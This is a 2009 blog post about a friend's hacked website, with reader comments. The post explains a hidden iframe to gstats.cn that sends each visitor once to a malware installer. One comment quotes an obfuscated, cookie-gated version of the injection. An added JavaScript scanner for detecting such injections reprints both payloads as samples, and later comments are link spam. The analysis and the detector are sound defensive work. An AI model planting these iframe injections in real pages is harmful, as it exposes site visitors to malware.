[personal profile] dtm
Yeah, yeah. First post in a long time, first post of the new year, first post with a new US President, etc. Assume I've groveled sufficiently for not posting in ages.

So the other day I visited a website belonging to a friend and my web browser completely freaked out, blocking the site and saying that it linked to all sorts of disreputable places. That is to say, it warned that my friend's site was including material from sites that attempted to install all sorts of malware.

Now, this was odd, but occasionally a bad ad gets into an ad network, and then everyone showing those ads is unwittingly displaying malware. I figured that was what had happened, since when I went back and visited the site again, all was fine.

Only, after reloading her page I discovered that my friend doesn't run ads on her site.

Instead, what I discovered after looking at the source was that someone had hacked her site and inserted
<iframe src=http://gstats.cn style=display:none></iframe>
into the page. That is, an invisible (display:none) frame that pulls in the contents of http://gstats.cn, so the visitor's browser fetches that site without anything appearing on the page.

A little poking revealed that gstats.cn is a very interesting site: the first time a given IP address visits, it is redirected to a site that attempts to install malware. On second and subsequent visits from that address, the site pretends that nothing's there (and incidentally, probably violates Google's trademark while doing so).

Why would anyone do this?

Imagine for a moment that you're the kind of person who breaks into other people's websites to spread malware. You're probably doing this because someone is paying you to send spam through infected machines under your control, or to steal personal information from end users' machines. As long as the website you defaced keeps the reference to your domain in its pages, you get to infect more and more people. So one of your goals is to keep the owners of the website from realizing that something's wrong and fixing it.

For people like that, it must be a real pain that not every web visitor is infectable. Many people run anti-virus software or paranoid web browsers that pop up errors when you try to infect them, and errors popping up is bad if you want to go undetected.

So you compromise: you attempt to infect each visitor once, and after that you show something harmless. People running vulnerable systems are infected the first time, so there's no point in infecting them again; people running systems that pop up errors when you try to infect them see the error once, but never again.

After all, everyone is trained in the idea that the web has minor, one-time glitches all the time. So some error popped up when you visited a site once. Who's going to look too deeply if the error never re-occurs?

Very sneaky. It appears that gstats.cn is just the most recent such one-time redirect site for this batch of criminals; hostads.cn was an earlier site of theirs that appears to have operated on the same principle.

Date: 2009-01-21 05:02 pm (UTC)
From: [identity profile] astrogeek01.livejournal.com
Does that "preview" feature that a lot of browsers/web pages do now cause enough loading of the page to run that little script?

gstats code getting sneakier

Date: 2009-03-08 02:35 pm (UTC)
From: (Anonymous)
I just found a client's site hacked, and the redirect code inserted inside the 2-line Google page tracking script on the page, like this:

var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("<ifra"+"me src"+"="+"h"+"ttp:"+"/"+"/g"+"stats.cn"+" "+"style"+"=disp"+"lay:none></if"+"r"+"ame>");
document.cookie = "dfq=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
pageTracker._trackPageview();
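
The two injections quoted on this page, the plain hidden iframe in the post and the cookie-gated, string-split one in the comment above, can both be caught with the same check. The scanner below is an added example, not code from the original post or from the commenter: it folds runs of concatenated string literals ("<ifra"+"me" ...) back into one literal before looking for iframes whose style hides them, and separately flags the "write the frame only if a marker cookie is absent, then set the cookie" gating that makes the redirect fire once per visitor. The three sample pages are constructed for this example; the clean page's example.com embed URL is a placeholder, not a site the page mentions.

```javascript
// Added example: scanner for hidden-iframe injections in saved page source.
// Heuristic, regex-based: it pairs quote characters in source order, so stray
// quotes in page text can confuse it. Run over a saved copy of the HTML.

// A JS string literal, double- or single-quoted, with backslash escapes.
const STR_LIT = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'/g;
// Two or more literals joined by "+", the obfuscation used in the comment.
const CONCAT_RUN = /(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')(?:\s*\+\s*(?:"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'))+/g;
// Styles and sizes that make a frame invisible to the visitor.
const HIDDEN_STYLE = /display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*[:=]\s*["']?0(?!\d)/i;

// Replace every "a"+"b"+"c" run with the single literal "abc".
function foldStringConcat(source) {
  return source.replace(CONCAT_RUN, (run) => {
    const parts = run.match(STR_LIT);
    return '"' + parts.map((p) => p.slice(1, -1)).join('') + '"';
  });
}

// Return one record per iframe that is hidden, with its src and whether the
// tag only appears after folding (i.e. was assembled by script).
function findHiddenIframes(html) {
  const folded = foldStringConcat(html);
  const tag = /<iframe\b([^>]*)>/gi;
  const hits = [];
  let m;
  while ((m = tag.exec(folded)) !== null) {
    const attrs = m[1];
    if (!HIDDEN_STYLE.test(attrs)) continue;
    const src = (attrs.match(/\bsrc\s*=\s*["']?([^\s"'>]+)/i) || [])[1] || '';
    hits.push({ src, obfuscated: !html.includes(m[0]) });
  }
  return hits;
}

// True when a document.write is guarded by a document.cookie test and a cookie
// is set somewhere on the page: the "show it once, then go quiet" pattern.
function isCookieGated(html) {
  const folded = foldStringConcat(html);
  const gate = /if\s*\([^{]*document\.cookie[^{]*\{[^}]*document\.write\s*\(/i;
  const setsMarker = /document\.cookie\s*=(?!=)/i;
  return gate.test(folded) && setsMarker.test(folded);
}

function scan(html) {
  return { hiddenIframes: findHiddenIframes(html), cookieGated: isCookieGated(html) };
}

// Constructed sample 1: the plain injection quoted in the post.
const SAMPLE_PLAIN = `<html><body>
<p>Welcome to my site.</p>
<iframe src=http://gstats.cn style=display:none></iframe>
</body></html>`;

// Constructed sample 2: the cookie-gated, string-split variant from the comment.
const SAMPLE_OBFUSCATED = `<html><body>
<p>Welcome to my site.</p>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-#######-1");
pageTracker._initData();
if (document.cookie.search("dfq=1") == -1) {
document.write("<ifra"+"me src"+"="+"h"+"ttp:"+"/"+"/g"+"stats.cn"+" "+"style"+"=disp"+"lay:none></if"+"r"+"ame>");
document.cookie = "dfq=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
pageTracker._trackPageview();
</script>
</body></html>`;

// Constructed sample 3: a visible embed that should not be flagged
// (example.com is a placeholder address, not a site from the page).
const SAMPLE_CLEAN = `<html><body>
<p>A video I like.</p>
<iframe src="https://example.com/embed/video" width="560" height="315"></iframe>
</body></html>`;

for (const [name, html] of [['plain', SAMPLE_PLAIN], ['obfuscated', SAMPLE_OBFUSCATED], ['clean', SAMPLE_CLEAN]]) {
  console.log(name, JSON.stringify(scan(html)));
}
```

On the first two samples the scanner reports one hidden frame pointing at http://gstats.cn, marked obfuscated only for the second, and flags the second as cookie-gated; the clean page produces no findings. Because the gating sets a cookie (or, in the post's case, remembers the IP), a quick visual check of the site from the owner's own browser will look fine; grepping saved source, as here, or fetching the page from a fresh client is what actually reveals it.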

Re: gstats code getting sneakier

Date: 2009-03-11 01:23 pm (UTC)
From: [identity profile] autopope.livejournal.com
As a point of note, "cn" as a word suffix (regexp search: cn$) doesn't appear at all in /usr/share/dict/words on this here unix system.

So some sort of check for /cn["\/]*/ or something like that ought to weed out everything in the .cn TLD.

This isn't much use if you want to link to legitimate Chinese sites, but realistically it ought to be a hot-button for auto-moderation of blog comments and similar.

Re: gstats code getting sneakier

Date: 2009-06-14 11:44 pm (UTC)
From: (Anonymous)
How to prevent this from happening??

Date: 2012-01-29 01:51 am (UTC)
From: [identity profile] dearrerewa.livejournal.com
Hooray! Whoever wrote this wrote something great! Image (http://zimnyayaobuv.ru/) Image (http://zimnyaya-obuv.ru/)

Date: 2012-02-16 02:20 pm (UTC)
From: [identity profile] ximenezehu.livejournal.com
Interesting to read. Image (http://zimnyayaobuv.ru/) Image (http://zimnyaya-obuv.ru/)

Date: 2012-07-08 05:22 pm (UTC)
From: [identity profile] samarqandr.livejournal.com

http://www.youtube.com/watch?v=c6M_6qOz-yw

Page generated Jul. 24th, 2017 12:50 pm
Powered by Dreamwidth Studios